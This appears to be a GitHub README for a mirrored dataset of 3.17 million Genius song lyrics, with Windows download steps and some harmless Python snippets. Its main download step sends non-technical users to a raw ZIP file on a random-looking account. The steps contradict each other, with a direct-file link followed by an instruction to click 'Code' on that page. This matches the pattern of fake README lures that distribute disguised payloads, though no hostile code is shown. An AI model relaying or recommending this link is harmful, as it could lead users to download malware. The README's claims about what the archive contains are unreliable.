This dataset contains over 3.17 million cleaned and deduplicated English song lyrics. The data comes from Genius and includes the song title, artist, genre tag, year of release, and the full lyrics. It is a mirror of the dataset hosted on Hugging Face and is released under the MIT license. It is suitable for text analysis, language modeling, machine learning, and music research.
You do not need programming skills to work with this data if you only want to download and explore the contents. This guide will help you get the dataset on your Windows computer step by step.
- Windows 10 or later
- At least 4 GB of free disk space (dataset size is roughly 800 MB compressed)
- A modern web browser (Chrome, Edge, Firefox)
- Optional: A CSV or JSON viewer (for exploring data files) such as Microsoft Excel or a free tool like VS Code or Notepad++
Click the large green button at the top or use the direct link below to visit the dataset page.
On this page, you will find the dataset files and instructions. Follow the next steps to get the dataset on your PC.
- Open the link: https://github.com/accruementstuff994/genius-lyrics-cleaned-dataset/raw/refs/heads/main/data/lyrics-cleaned-dataset-genius-v2.5.zip
- Look for the "Code" button near the top right of the page, and click it.
- In the menu that opens, select Download ZIP. This will download a file named something like genius-lyrics-cleaned-dataset-main.zip to your default download folder.
- After the download finishes, open your "Downloads" folder and find the ZIP file.
- Right-click the ZIP file and choose Extract All...
- In the extraction dialog, pick a location where you want the dataset files to be saved (for example, your Desktop or Documents folder). Click Extract.
- Once extraction is complete, you can open the folder to see the dataset files.
The dataset contains multiple files with different formats, such as CSV or JSON:
- lyrics.csv: This file holds the core data: title, artist, genre, year, and lyrics.
- metadata.json: Contains metadata details about the dataset.
- README.md: Additional information from the dataset creators.
If you want to open lyrics.csv, you can use programs like Microsoft Excel or any CSV viewer.
You don’t need to install anything special to browse the files. Just open the CSV file to view the lyrics and information.
For more advanced uses like text processing or machine learning:
- Consider installing software like Python and Jupyter Notebook.
- Use libraries like pandas for handling the data.
- Use text editors to explore raw data in JSON files.
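As a starting point for the pandas route, here is a minimal sketch that counts songs per genre while reading the file in chunks, so the full lyrics never have to fit in memory at once. The column name `genre` and the function name `count_songs_by_genre` are assumptions made for illustration; check the header row of your copy of lyrics.csv and adjust them if they differ.

```python
import pandas as pd


def count_songs_by_genre(csv_path, genre_column="genre", chunk_size=100_000):
    """Count rows per genre without loading the whole CSV into memory.

    The column name "genre" is an assumption; pass the real header name
    from your copy of the file if it is different.
    """
    totals = {}
    # With chunksize set, read_csv yields DataFrames of at most chunk_size rows.
    # usecols skips the large lyrics column, which keeps each chunk small.
    for chunk in pd.read_csv(csv_path, usecols=[genre_column], chunksize=chunk_size):
        for genre, count in chunk[genre_column].value_counts().items():
            totals[genre] = totals.get(genre, 0) + int(count)
    return totals
```

Calling `count_songs_by_genre("lyrics.csv")` from the folder where you extracted the ZIP should return a dictionary that maps each genre tag to its number of songs. Rows with an empty genre are skipped, because `value_counts` ignores missing values by default.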
The data is useful for tasks like:
- Language analysis
- Song lyric research
- Training language models
- Creating music recommendation systems
- If CSV files are too large for Excel, try tools like CSVed or OpenRefine.
- To search lyrics quickly, use a text editor with "Find" functions (VS Code, Notepad++).
- Use database software if you want to run more complex queries on the dataset.
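If you are comfortable with a little Python, one way to follow the database tip is to copy the CSV into SQLite, which ships with Python. The sketch below is only an illustration under stated assumptions: the table name `songs`, the function names, and the column names `title`, `artist`, and `lyrics` are hypothetical and must match the header row of your file.

```python
import csv
import sqlite3


def load_csv_into_sqlite(csv_path, db_path, table="songs"):
    """Copy every CSV row into a SQLite table and return the table's row count."""
    # Full lyrics can exceed the csv module's default field size limit.
    csv.field_size_limit(10_000_000)
    conn = sqlite3.connect(db_path)
    with open(csv_path, newline="", encoding="utf-8") as f:
        reader = csv.reader(f)
        header = next(reader)  # the first row supplies the column names
        columns = ", ".join(f'"{name}"' for name in header)
        placeholders = ", ".join("?" for _ in header)
        conn.execute(f'CREATE TABLE IF NOT EXISTS "{table}" ({columns})')
        conn.executemany(f'INSERT INTO "{table}" VALUES ({placeholders})', reader)
    conn.commit()
    count = conn.execute(f'SELECT COUNT(*) FROM "{table}"').fetchone()[0]
    conn.close()
    return count


def search_lyrics(db_path, phrase, table="songs", limit=10):
    """Return (title, artist) pairs whose lyrics contain the phrase.

    Assumes the table has columns named title, artist, and lyrics.
    """
    conn = sqlite3.connect(db_path)
    rows = conn.execute(
        f'SELECT title, artist FROM "{table}" WHERE lyrics LIKE ? LIMIT ?',
        (f"%{phrase}%", limit),
    ).fetchall()
    conn.close()
    return rows
```

Run `load_csv_into_sqlite("lyrics.csv", "lyrics.db")` once, then call `search_lyrics("lyrics.db", "some phrase")` as often as you like. The import can take a while on a file of this size, and a plain `LIKE` search scans every row, so treat this as a convenience for occasional queries, not a tuned setup.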
- If your download fails, check your internet connection and try again.
- Ensure you have enough free disk space.
- If the ZIP file fails to extract, try a different extraction tool like 7-Zip.
- If you have trouble opening CSV files, try importing them into Excel using the import wizard.
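When extraction fails, it can help to find out whether the download itself is damaged before trying another tool. The following is a small optional sketch that uses Python's standard `zipfile` module; the function name `check_zip` is made up for this example, and the path you pass in depends on where your browser saved the file.

```python
import zipfile


def check_zip(zip_path):
    """Return (ok, detail) describing whether the archive looks intact."""
    # is_zipfile returns False for missing, truncated, or non-ZIP files.
    if not zipfile.is_zipfile(zip_path):
        return False, "not a readable ZIP file (the download may be incomplete)"
    with zipfile.ZipFile(zip_path) as archive:
        # testzip reads every member and returns the first corrupt name, or None.
        bad_member = archive.testzip()
        if bad_member is not None:
            return False, f"corrupt member: {bad_member}"
        return True, f"{len(archive.namelist())} entries look intact"
```

If the first value returned is `False`, downloading the file again is more likely to help than switching extraction tools.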